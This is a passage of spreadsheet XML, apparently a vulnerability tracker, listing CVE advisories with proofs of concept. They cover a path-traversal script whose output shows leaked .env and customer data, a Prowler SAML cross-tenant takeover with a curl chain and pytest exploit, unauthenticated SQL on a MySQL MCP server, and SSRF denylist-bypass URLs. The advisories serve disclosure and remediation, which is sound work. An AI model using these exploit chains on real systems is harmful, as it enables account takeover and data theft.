"cors":true,"headers":[],"proxyReqHeaders":[],"proxyResHeaders":[],"data":[]}
JSON
npm i -g @mockoon/cli@9.6.1 &gt;/dev/null 2&gt;&amp;1
mockoon-cli start --data env.json --port 3000 &gt;/tmp/srv.log 2&gt;&amp;1 &amp;
sleep 6
node -e '
const UA={headers:{"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}};
const g=async(q)=&gt;{const r=await fetch("http://127.0.0.1:3000/download?name="+encodeURIComponent(q),UA);return (await r.text()).trim();};
(async()=&gt;{
 console.log("[*] intended file (public/index.txt)    :",await g("index.txt"));
 console.log("[+] escape -&gt; ../public_backup/.env     :",await g("../public_backup/.env"));
 console.log("[+] escape -&gt; ../public_backup/customers:",await g("../public_backup/customers.csv"));
})();'
POC
docker run --rm -v /tmp/poc.sh:/poc.sh:ro node:20-bookworm-slim bash /poc.sh
```
Output:
```text
[*] intended file (public/index.txt)    : public landing page
[+] escape -&gt; ../public_backup/.env     : AWS_SECRET_ACCESS_KEY=redacted
[+] escape -&gt; ../public_backup/customers: Michael, michael@example.com, 555-22-7741
```
`../public_backup/.env` and `../public_backup/customers.csv` are served, outside `/work/public/`, because their absolute paths string-prefix `/work/public`</t>
        </is>
      </c>
      <c r="S926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59149</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59151</t>
        </is>
      </c>
      <c r="D927" s="5" t="inlineStr"/>
      <c r="E927" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F927" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr"/>
      <c r="L927" s="5" t="inlineStr">
        <is>
          <t>pip:prowler-cloud</t>
        </is>
      </c>
      <c r="M927" s="5" t="inlineStr">
        <is>
          <t>5.30.3</t>
        </is>
      </c>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr"/>
      <c r="P927" s="5" t="inlineStr"/>
      <c r="Q927" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R927" s="5" t="inlineStr">
        <is>
          <t>## SAML Tenant Binding Enables Cross-Tenant Account Takeover
### Summary
Prowler's SAML authentication flow trusted the email domain asserted in a SAMLResponse when deciding which tenant should receive the final token. A malicious tenant with its own SAML configuration and a self-controlled IdP could complete a valid SAML flow for its own configured domain, while asserting an email address from another configured domain.
In the vulnerable flow, the ACS finish logic later derived the tenant from the asserted email domain instead of binding token issuance to the tenant associated with the validated SAML configuration. This could cause a token to be issued for the wrong tenant.
The attacker does not generally need to claim the victim's email domain. If the victim tenant already has SAML configured for that domain, another tenant cannot claim it because `SAMLConfiguration.email_domain` and `SAMLDomainIndex.email_domain` are globally unique.
### Details
The confirmed root cause is in the SAML ACS finish and token issuance flow. The flow selected a SAML configuration through the ACS route, but later recalculated the tenant from the asserted user email domain:
```python
email_domain = user.email.split("@")[-1]
tenant = (
    SAMLConfiguration.objects.using(MainRouter.admin_db)
    .get(email_domain=email_domain)
    .tenant
)
```
This is unsafe because `user.email` is derived from the SAML assertion. The tenant used for membership updates and token issuance must come from the SAML configuration validated for the current ACS route, not from the asserted email domain.
The attack is made possible by several compounding weaknesses:
1. **No domain ownership proof** (`api/src/backend/api/models.py:2100, 2130-2152`): `SAMLConfiguration.email_domain` is validated for format and global uniqueness, but not for domain ownership. Any authenticated tenant admin can claim an unclaimed domain string, but cannot claim a domain already configured by another tenant.
2. **Global SAML domain index** (`api/src/backend/api/models.py:2200-2201`): `SAMLDomainIndex.update_or_create(email_domain=self.email_domain, defaults={'tenant': self.tenant})` maps each configured domain to its tenant. If token issuance later trusts the asserted email domain, it can resolve a tenant different from the one selected by the ACS route.
3. **Hardcoded auto-connect** (`api/src/backend/config/settings/social_login.py:23, 25`): `SOCIALACCOUNT_EMAIL_AUTHENTICATION = True` and `SOCIALACCOUNT_EMAIL_AUTHENTICATION_AUTO_CONNECT = True` are hardcoded and cannot be disabled at runtime.
4. **IdP-initiated SSO enabled** (`api/src/backend/config/settings/social_login.py:78`): `reject_idp_initiated_sso: False` allows the attacker to initiate the flow without requiring any action from the victim.
5. **Token issuance for the wrong tenant** (`api/src/backend/api/v1/views.py:853-873`): after SAML authentication, the vulnerable ACS finish flow could create membership and issue a `SAMLToken` using a tenant derived from the asserted email domain instead of the validated SAML configuration.
6. **Token switch impact** (`api/src/backend/api/v1/serializers.py:272`): the token switch endpoint checks that the authenticated user is a member of the target tenant. If the attacker obtains a JWT for the victim user, they can switch into tenants where that user is already a member.
### PoC
**Environment setup:**
```bash
# Build the PoC Docker image (build context = repo root)
docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Start the stack (PostgreSQL + PoC runner)
docker compose -f vuln-001/docker-compose-poc.yml up --no-build --abort-on-container-exit
```
**Automated test (runs inside the container):**
```bash
python -m pytest poc_vuln001.py -v -s --no-header --tb=short
```
**Manual HTTP exploitation chain (against a live Prowler API):**
**Step 1 - Attacker configures SAML for their own email domain:**
```bash
curl -i -X POST "$API/api/v1/saml-config" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -H "Content-Type: application/vnd.api+json" \
  --data '{
    "data":{"type":"saml-configurations","attributes":{
      "email_domain":"attacker.com",
      "metadata_xml":"&lt;md:EntityDescriptor entityID=\"evil-idp\" xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\"&gt;...attacker cert and SSO URL...&lt;/md:EntityDescriptor&gt;"
    }}
  }'
```
The attacker does not need to claim `victim.com`. If `victim.com` is already configured by the victim tenant, the attacker cannot claim it because SAML domains are globally unique.
**Step 2 - Attacker posts a signed SAMLResponse asserting `user@victim.com`:**
```bash
# SIGNED_ASSERTION is a base64-encoded SAMLResponse signed with the attacker's private key,
# valid for the attacker's configured IdP, but asserting NameID = user@victim.com
curl -i -L -c c.jar -b c.jar \
  -X POST "$API/api/v1/accounts/saml/attacker.com/acs/" \
  --data-urlencode "SAMLResponse=$SIGNED_ASSERTION"
```
**Step 3 - Vulnerable ACS finish logic derives the tenant from the asserted email domain:**
In the vulnerable version, the finish flow used `user.email.split("@")[-1]` to resolve the tenant. If the asserted domain mapped to another tenant's SAML configuration, token issuance could be bound to the wrong tenant.
**Step 4 - Exchange the SAML token for a victim JWT:**
```bash
curl -s -X POST "$API/api/v1/tokens/saml?id=$SAML_TOKEN_ID"
# Returns access/refresh JWT if the temporary SAML token is valid and has not expired
```
**Step 5 - Switch into the victim's real tenant:**
```bash
curl -s -X POST "$API/api/v1/tokens/switch" \
  -H "Authorization: Bearer $VICTIM_JWT" \
  -H "Content-Type: application/vnd.api+json" \
  --data '{
    "data":{
      "type":"tokens-switch-tenant",
      "attributes":{
        "tenant_id":"&lt;victim-real-tenant-uuid&gt;"
      }
    }
  }'
# Returns a valid token scoped to the victim's tenant
```
**Observed output from the automated PoC:**
Note: this adapter-focused PoC demonstrates the account-linking behavior, but it does not prove the full token issuance chain by itself. The full exploit depends on the ACS finish flow issuing a token for a tenant derived from the asserted email domain.
```
[+] Victim user created in DB:
    email = victim@victim.com
    id    = b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
[+] Simulated SAMLResponse posted to ACS endpoint:
    URL:    POST /api/v1/accounts/saml/victim.com/acs/
    NameID: victim@victim.com  (attacker-controlled)
[*] Calling ProwlerSocialAccountAdapter.pre_social_login()
    File: api/src/backend/api/adapters.py:17
[!] sociallogin.connect() was called!
    connected user email: victim@victim.com
    connected user id:    b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
    victim user id:       b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - Victim user id in DB:            b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - User passed to connect():        b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - IDs match (victim's account):   True
  - Domain ownership check skipped: True (no SAMLConfiguration lookup in adapter)
PASSED
======================== 1 passed, 2 warnings in 35.42s ========================
```
**Recommended remediation** (`api/src/backend/api/v1/views.py`):
Bind token issuance to the SAML configuration selected by the ACS route.
The ACS finish flow should verify that the following values all match:
- the `organization_slug` from the ACS route
- the `SAMLConfiguration.email_domain`
- the domain portion of the asserted SAML user email
Then issue the token using the tenant from that validated SAML configuration:
```python
tenant = saml_config.tenant
```
The tenant must not be recalculated from `user.email`.
### Impact
This is an **Improper Authentication (CWE-287)** vulnerability that enables **cross-tenant account takeover**. An authenticated Prowler user with a controlled SAML IdP could potentially obtain a token for another tenant if the ACS finish flow derived the tenant from the asserted email domain instead of the validated SAML configuration.
**Who is impacted:** users of Prowler instances where SAML is enabled and the target email domain maps to a configured SAML tenant. Because `reject_idp_initiated_sso` is `False`, no victim interaction is required once the attacker controls a valid SAML configuration and IdP for their own tenant.
**Consequences:**
- Full read/write access to the victim's cloud security audit findings across all configured providers (AWS, GCP, Azure, etc.)
- Ability to enumerate, modify, or delete compliance findings and integration secrets within the victim's tenant
- Lateral movement into any additional tenants the victim belongs to via the token switch endpoint
- Possible persistent access depending on the SAML account-linking behavior in the affected version
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001 PoC: SAML Domain Claiming Enables Cross-Tenant Account Takeover
#
# Builds a minimal Prowler API test environment to reproduce the vulnerability
# in api/src/backend/api/adapters.py (pre_social_login, lines 17-25).
#
# Build context must be the parent directory:
#   docker build -t vuln001-poc -f vuln-001/Dockerfile .
FROM python:3.12.10-slim-bookworm
LABEL maintainer="security-research"
LABEL description="PoC environment for VULN-001: SAML domain claiming account takeover"
# Install system packages required for:
#   - xmlsec (python-saml / django-allauth SAML): libxml2, libxmlsec1
#   - psycopg2: PostgreSQL client headers
#   - uv / prowler git dep: git, gcc, g++
RUN apt-get update &amp;&amp; apt-get install -y --no-install-recommends \
    gcc \
    g++ \
    make \
    git \
    libxml2-dev \
    libxmlsec1-dev \
    libxmlsec1-openssl \
    pkg-config \
    libtool \
    libxslt1-dev \
    python3-dev \
    &amp;&amp; rm -rf /var/lib/apt/lists/*
# Install uv (same version as the original Dockerfile)
RUN pip install --no-cache-dir uv==0.11.14
WORKDIR /prowler
# Copy API dependency manifests first (for layer caching)
COPY repo/api/pyproject.toml repo/api/uv.lock ./api/
# Install all Python dependencies from the locked file.
# This includes: django, django-allauth[saml], prowler (from git), psycopg2, etc.
WORKDIR /prowler/api
RUN uv sync --locked --no-install-project &amp;&amp; rm -rf ~/.cache/uv
# Copy the full backend source code
COPY repo/api/src/backend/ ./src/backend/
# Copy the PoC test into the backend working directory so pytest can discover it
COPY vuln-001/poc.py ./src/backend/poc_vuln001.py
WORKDIR /prowler/api/src/backend
# Set up environment variables for the test run.
# DJANGO_SETTINGS_MODULE points to config.django.testing which uses PostgreSQL.
ENV PATH="/prowler/api/.venv/bin:$PATH"
ENV DJANGO_SETTINGS_MODULE=config.django.testing
ENV POSTGRES_HOST=postgres
ENV POSTGRES_USER=prowler_admin
ENV POSTGRES_PASSWORD=prowler_password
ENV POSTGRES_DB=prowler_test_db
ENV POSTGRES_PORT=5432
ENV SECRET_KEY=poc-test-secret-key-not-for-production
ENV SECRETS_ENCRYPTION_KEY=ZMiYVo7m4Fbe2eXXPyrwxdJss2WSalXSv3xHBcJkPl0=
# Provide dummy values for optional services (Valkey/Celery not needed for unit tests)
ENV VALKEY_HOST=localhost
ENV VALKEY_PORT=6379
ENV VALKEY_PASSWORD=""
# Neo4j not needed for adapter tests
ENV NEO4J_USER=neo4j
ENV NEO4J_PASSWORD=neo4j
# Silence Sentry in test runs
ENV DJANGO_SENTRY_DSN=""
CMD ["python", "-m", "pytest", "poc_vuln001.py", "-v", "-s", "--no-header", "--tb=short"]
```
#### `poc.py`
```python
"""
PoC for VULN-001: SAML Domain Claiming Enables Cross-Tenant Account Takeover
Product:  toniblyx/prowler v5.30.0 (commit c2cef99)
CWE:      CWE-287 - Improper Authentication
CVSS:     9.6 (Critical)  AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Vulnerability location:
    api/src/backend/api/adapters.py  lines 17-25  (pre_social_login)
    api/src/backend/config/settings/social_login.py  lines 23, 25, 78
Root cause:
    ProwlerSocialAccountAdapter.pre_social_login() trusts the SAML NameID email
    from the assertion and calls get_user_by_email() which does a GLOBAL user
    table lookup with no tenant-scope or domain-ownership check.  If a user
    with that email already exists, sociallogin.connect() links the attacker's
    SAML session to that account - giving the attacker control of the victim.
Attack chain:
    1. Attacker registers a Prowler account and creates a tenant (normal user).
    2. Attacker POSTs to /api/v1/saml-config claiming email_domain=victim.com.
       models.py only validates format/uniqueness - no ownership proof.
    3. Attacker's IdP (self-controlled) issues a SAMLResponse signed with the
       attacker's certificate, asserting NameID=victim@victim.com.
    4. ACS endpoint (POST /api/v1/accounts/saml/victim.com/acs/) triggers
       pre_social_login.  The adapter looks up victim@victim.com globally and
       calls sociallogin.connect(request, victim_user) - ACCOUNT LINKED.
    5. views.py issues a SAMLToken (JWT) for the victim account.
    6. Attacker uses /api/v1/tokens/saml?id=&lt;token_id&gt; to obtain victim's JWT.
This test proves steps 4 - the critical account-linking step - using the real
production adapter code and a real PostgreSQL database.  sociallogin.connect()
is spied upon (not replaced) so we can capture the exact user object passed in.
"""
import pytest
from unittest.mock import MagicMock
from allauth.socialaccount.models import SocialLogin
from django.contrib.auth import get_user_model
from api.adapters import ProwlerSocialAccountAdapter
User = get_user_model()
VICTIM_EMAIL = "victim@victim.com"
VICTIM_DOMAIN = "victim.com"
ATTACKER_EMAIL = "attacker@evil-corp.com"
# ---------------------------------------------------------------------------
# Helper: print a separator for readable test output
# ---------------------------------------------------------------------------
def section(title: str) -&gt; None:
    width = 70
    print(f"\n{'=' * width}")
    print(f"  {title}")
    print(f"{'=' * width}")
# ---------------------------------------------------------------------------
# Core PoC test
# ---------------------------------------------------------------------------
@pytest.mark.django_db
class TestSAMLDomainClaimingAccountTakeover:
    """
    Proves VULN-001 end-to-end using the real ProwlerSocialAccountAdapter and
    a live PostgreSQL test database created by pytest-django.
    The test creates a victim user in the database, then simulates the exact
    HTTP flow an attacker would trigger via a crafted SAMLResponse.
    """
    def test_attacker_saml_session_links_to_victim_account(self, rf):
        """
        Verify that pre_social_login() links the attacker's SAML sociallogin
        to an existing victim account without ANY domain-ownership check.
        Expected outcome (vulnerability confirmed):
            sociallogin.connect(request, victim_user) is called where
            victim_user.email == VICTIM_EMAIL and victim_user was created
            independently of the SAML session - i.e. the adapter does NOT
            verify that the SAML registrant owns victim.com.
        """
        # ---------------------------------------------------------------
        # STEP 1 - Create the victim's pre-existing account in the database.
        #          In a real attack the victim signed up with email+password
        #          and has an existing Prowler tenant membership.
        # ---------------------------------------------------------------
        section("STEP 1: Create victim account in database")
        victim_user = User.objects.create_user(
            name="Victim User",
            email=VICTIM_EMAIL,
            password="VictimS3cret!",
        )
        # Confirm the user was actually persisted (real DB round-trip)
        fetched = User.objects.get(email=VICTIM_EMAIL)
        assert fetched.id == victim_user.id, "Victim user must exist in database"
        print(f"[+] Victim user created in DB:")
        print(f"    email = {victim_user.email}")
        print(f"    id    = {victim_user.id}")
        # ---------------------------------------------------------------
        # STEP 2 - Simulate the attacker's SAML flow.
        #
        #   a. Attacker previously registered a SAMLConfiguration for
        #      email_domain='victim.com' via POST /api/v1/saml-config.
        #      (No domain ownership proof is required - see models.py:2100)
        #
        #   b. Attacker's self-controlled IdP issues a SAMLResponse signed
        #      with the attacker's certificate, asserting:
        #        NameID = victim@victim.com
        #
        #   c. allauth processes the ACS POST and calls pre_social_login()
        #      before creating/updating the social account record.
        #
        #   We represent the processed SAMLResponse as an allauth SocialLogin
        #   object.  The 'connect' method is spied upon to capture arguments.
        # ---------------------------------------------------------------
        section("STEP 2: Attacker triggers ACS with crafted SAMLResponse")
        # Build the sociallogin object that allauth would construct after
        # validating the SAMLResponse signature (which uses the *attacker's*
        # certificate - no server-side cert pinning for victim.com).
        attacker_saml_login = MagicMock(spec=SocialLogin)
        attacker_saml_login.provider = MagicMock()
        attacker_saml_login.provider.id = "saml"          # Provider discriminator
        attacker_saml_login.account = MagicMock()
        attacker_saml_login.account.extra_data = {}       # SAML uses user.email path
        attacker_saml_login.user = MagicMock()
        # The attacker's IdP signs a NameID of victim@victim.com in the SAMLResponse.
        # This is the email that pre_social_login() will trust without verification.
        attacker_saml_login.user.email = VICTIM_EMAIL
        attacker_saml_login.connect = MagicMock()         # Spy: record call arguments
        # Simulate the ACS request (POST to the victim.com ACS endpoint)
        acs_request = rf.post(
            f"/api/v1/accounts/saml/{VICTIM_DOMAIN}/acs/",
            data={"SAMLResponse": "&lt;attacker-signed-base64&gt;"},
        )
        print(f"[+] Simulated SAMLResponse posted to ACS endpoint:")
        print(f"    URL:    POST /api/v1/accounts/saml/{VICTIM_DOMAIN}/acs/")
        print(f"    NameID: {attacker_saml_login.user.email}  (attacker-controlled)")
        # ---------------------------------------------------------------
        # STEP 3 - Execute the vulnerable adapter method.
        #
        #   api/src/backend/api/adapters.py lines 17-25:
        #
        #   def pre_social_login(self, request, sociallogin):
        #       email = sociallogin.account.extra_data.get("email")  # line 19
        #       if sociallogin.provider.id == "saml":
        #           email = sociallogin.user.email   # line 21 - trusts SAML NameID
        #       if email:
        #           existing_user = self.get_user_by_email(email)  # line 23 - global DB lookup
        #           if existing_user:
        #               sociallogin.connect(request, existing_user)  # line 25 - ACCOUNT LINKED
        # ---------------------------------------------------------------
        section("STEP 3: Execute pre_social_login (vulnerable code path)")
        adapter = ProwlerSocialAccountAdapter()
        print(f"[*] Calling ProwlerSocialAccountAdapter.pre_social_login()")
        print(f"    File: api/src/backend/api/adapters.py:17")
        adapter.pre_social_login(acs_request, attacker_saml_login)
        # ---------------------------------------------------------------
        # STEP 4 - Verify the attack succeeded.
        # ---------------------------------------------------------------
        section("STEP 4: Verify attack outcome")
        assert attacker_saml_login.connect.called, (
            "FAIL: sociallogin.connect() was NOT called - "
            "the attack path did not execute"
        )
        call_args = attacker_saml_login.connect.call_args[0]
        _, connected_user = call_args   # connect(request, existing_user)
        print(f"[!] sociallogin.connect() was called!")
        print(f"    connected user email: {connected_user.email}")
        print(f"    connected user id:    {connected_user.id}")
        print(f"    victim user id:       {victim_user.id}")
        # The connected user must be the VICTIM (looked up from global DB)
        assert connected_user.email == VICTIM_EMAIL, (
            f"FAIL: connect() was called with {connected_user.email!r}, "
            f"expected {VICTIM_EMAIL!r}"
        )
        assert str(connected_user.id) == str(victim_user.id), (
            f"FAIL: connect() user id {connected_user.id} != victim id {victim_user.id}"
        )
        # Confirm no domain-ownership check happened:
        # The adapter does not inspect the SAML configuration to verify that
        # the sociallogin's tenant registered victim.com before accepting the email.
        section("RESULT: VULNERABILITY CONFIRMED")
        print(f"[PASS] CWE-287 Improper Authentication - SAML domain claiming attack")
        print()
        print(f"  Root cause (adapters.py:21-25):")
        print(f"    email = sociallogin.user.email  # trusts SAML NameID: {VICTIM_EMAIL}")
        print(f"    existing_user = self.get_user_by_email(email)  # GLOBAL lookup, no tenant scope")
        print(f"    sociallogin.connect(request, existing_user)  # links attacker session to victim")
        print()
        print(f"  Contributing settings (social_login.py):")
        print(f"    SOCIALACCOUNT_EMAIL_AUTHENTICATION_AUTO_CONNECT = True  # hardcoded")
        print(f"    reject_idp_initiated_sso = False  # IdP-initiated attacks allowed")
        print()
        print(f"  Impact:")
        print(f"    - Attacker obtains JWT token for {VICTIM_EMAIL}")
        print(f"    - Attacker can access victim's cloud security findings")
        print(f"    - Attacker can switch to victim's tenant via /api/v1/tokens/switch")
        print(f"    - No victim interaction required (IdP-initiated SSO enabled)")
        print()
        print(f"  Evidence (this test run):")
        print(f"    - Victim user id in DB:            {victim_user.id}")
        print(f"    - User passed to connect():        {connected_user.id}")
        print(f"    - IDs match (victim's account):   {str(victim_user.id) == str(connected_user.id)}")
        print(f"    - Domain ownership check skipped: True (no SAMLConfiguration lookup in adapter)")
```</t>
        </is>
      </c>
      <c r="S927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59151</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59971</t>
        </is>
      </c>
      <c r="D928" s="5" t="inlineStr"/>
      <c r="E928" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F928" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K928" s="5" t="inlineStr"/>
      <c r="L928" s="5" t="inlineStr">
        <is>
          <t>pip:mysql-mcp-server</t>
        </is>
      </c>
      <c r="M928" s="5" t="inlineStr">
        <is>
          <t>0.4.2</t>
        </is>
      </c>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr"/>
      <c r="P928" s="5" t="inlineStr"/>
      <c r="Q928" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="R928" s="5" t="inlineStr">
        <is>
          <t>## Summary
In SSE/HTTP transport mode, `mysql_mcp_server` constructs `SseServerTransport` without passing `security_settings`. As a result, the MCP Python SDK's DNS-rebinding protection (Origin/Host header validation) is disabled; the Starlette application has no CORS or TrustedHost middleware; and the service binds to `0.0.0.0` by default with no authentication on any route.
**Trigger condition:** `MCP_TRANSPORT=sse`. The default stdio mode is not affected.
## Attack Scenarios
**Scenario A — Direct exposure:** Any network attacker can invoke `execute_sql` to run arbitrary SQL without credentials → full data dump, and via MySQL `FILE` privileges, arbitrary file read/write and RCE.
**Scenario B — DNS rebinding (local bind):** An attacker lures a victim's browser to a malicious page, rebinds their domain to `127.0.0.1`, and uses the browser as a proxy to invoke `execute_sql` as same-origin.
## Root Cause
In `src/mysql_mcp_server/server.py`:
1. `SseServerTransport` is constructed without `security_settings` — the SDK defaults `enable_dns_rebinding_protection` to `False`.
2. The Starlette app has no CORS or TrustedHost middleware.
3. All three routes (`/`, `/sse`, `/messages/`) are unauthenticated.
4. The service binds to `0.0.0.0` by default.
5. The sink is `cursor.execute(query)` with a fully attacker-controlled query.
## Impact
- Unauthenticated arbitrary SQL execution against the configured database
- Full data exfiltration and modification
- If the MySQL account holds `FILE` privilege: arbitrary file read (`LOAD_FILE`) and write (`INTO OUTFILE`) — potential RCE via webshell drop
- Internet-wide scanning has identified 25 publicly reachable SSE instances of this project
## Fix
Released in v0.4.2: DNS-rebinding protection is now enabled by passing `TransportSecuritySettings(enable_dns_rebinding_protection=True)` to `SseServerTransport`, and the documented recommended bind address is `127.0.0.1`.
## Credits
Discovered by Huanchen, SongWu (JHU), and BrookeYangRui (JHU).</t>
        </is>
      </c>
      <c r="S928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59971</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59973</t>
        </is>
      </c>
      <c r="D929" s="5" t="inlineStr"/>
      <c r="E929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F929" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr"/>
      <c r="L929" s="5" t="inlineStr">
        <is>
          <t>npm:@frontmcp/adapters, npm:frontmcp, npm:mcp-from-openapi</t>
        </is>
      </c>
      <c r="M929" s="5" t="inlineStr">
        <is>
          <t>1.5.0, 2.5.0</t>
        </is>
      </c>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr"/>
      <c r="P929" s="5" t="inlineStr"/>
      <c r="Q929" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R929" s="5" t="inlineStr">
        <is>
          <t>## Summary
The published fix for GHSA-v6ph-xcq9-qxxj / CVE-2026-39885 added a direct hostname denylist for OpenAPI external `$ref` dereferencing, but the latest patched dependency `mcp-from-openapi` 2.3.0 still makes backend-origin requests to loopback when the target is reached through hostname resolution, redirects, or IPv4-mapped IPv6 syntax.
FrontMCP latest release v1.2.1 and current main still call `OpenAPIToolGenerator.fromURL()` and `OpenAPIToolGenerator.fromJSON()` from `mcp-from-openapi` 2.3.0 when loading OpenAPI adapters. An attacker who can cause a hosted or multi-user FrontMCP deployment to load an untrusted OpenAPI spec can trigger requests from the server to localhost or private services during tool generation.
This is a latest-version bypass of the previous fix. A direct `http://127.0.0.1` `$ref` control is now denied and produces zero canary hits, while semantically equivalent loopback targets still reach the canary.
## Latest versions checked
- `frontmcp` npm latest: 1.2.1
- `@frontmcp/adapters` npm latest: 1.2.1
- `mcp-from-openapi` npm latest: 2.3.0
- FrontMCP release tag: v1.2.1, commit db323976c66297d684a3e63bbfe1db6b310f2944
- FrontMCP current main checked: c15b79abe8c6a3cb71d4b7a3bafb8190730dc756
The release tag and current main both keep `mcp-from-openapi` 2.3.0 in `package.json` and `libs/adapters/package.json`, and both keep the OpenAPI adapter forwarding untrusted `url`, `spec`, and `loadOptions.refResolution` into `OpenAPIToolGenerator`.
## Technical details
FrontMCP's OpenAPI adapter reaches the affected dependency paths:
- `libs/adapters/src/openapi/openapi.adapter.ts` imports `OpenAPIToolGenerator` from `mcp-from-openapi`.
- `loadOpenAPISpec()` calls `OpenAPIToolGenerator.fromURL(this.options.url, ...)` and forwards `loadOptions.refResolution`.
- The same method calls `OpenAPIToolGenerator.fromJSON(this.options.spec, ...)` and forwards `loadOptions.refResolution`.
In `mcp-from-openapi` 2.3.0, the patched guard is applied before the HTTP resolver fetches an external `$ref`. It checks the parsed URL hostname string against deny patterns for direct local and private addresses. The resolver does not resolve hostnames before allow or deny decisions, does not pin the validated IP to the fetch, and does not revalidate redirect targets before following them. It also misses IPv4-mapped IPv6 loopback forms.
As a result, these URLs are accepted by the guard but cause a loopback request from the backend:
- `http://127.0.0.1.nip.io:&lt;port&gt;/schema.json`, because the hostname string is not a direct IP even though it resolves to 127.0.0.1.
- `http://127.0.0.1.nip.io:&lt;port&gt;/redirect`, because the first host passes and the actual request follows a redirect to `http://127.0.0.1:&lt;port&gt;/schema.json`.
- `http://[::ffff:127.0.0.1]:&lt;port&gt;/schema.json` and `http://[::ffff:7f00:1]:&lt;port&gt;/schema.json`, because IPv4-mapped IPv6 loopback is not normalized and denied.
`OpenAPIToolGenerator.fromURL()` is also still unguarded for the initial OpenAPI spec URL. The PoC includes that as supporting evidence, but the primary report is the external `$ref` fix bypass.
## Reproduction
The attached local PoC starts a loopback canary and loads generated OpenAPI specs using `mcp-from-openapi` 2.3.0. The request body schema contains a single external `$ref` for each test case. The canary records every backend-origin request.
Run:
```bash
cd /home/unkn0wn/security_audit/frontmcp-ssrf-poc
node repro-frontmcp-latest-ssrf-bypasses.mjs
```
Important output from a fresh run on 2026-05-25:
```json
{"name":"direct-127-denied-control","kind":"external_ref","refUrl":"http://127.0.0.1:45117/schema.json","ok":false,"hitCount":0,"hits":[]}
{"name":"dns-name-to-127-bypass","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"127.0.0.1.nip.io:45117","authorization":null}]}
{"name":"dns-name-to-127-bypass-with-allowedHosts","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"127.0.0.1.nip.io:45117","authorization":null}]}
{"name":"redirect-to-127-after-allowed-host","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/redirect","ok":true,"hitCount":2,"hits":[{"url":"/redirect","host":"127.0.0.1.nip.io:45117","authorization":null},{"url":"/schema.json","host":"127.0.0.1:45117","authorization":null}]}
{"name":"ipv4-mapped-ipv6-dotted-bypass","kind":"external_ref","refUrl":"http://[::ffff:127.0.0.1]:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"[::ffff:7f00:1]:45117","authorization":null}]}
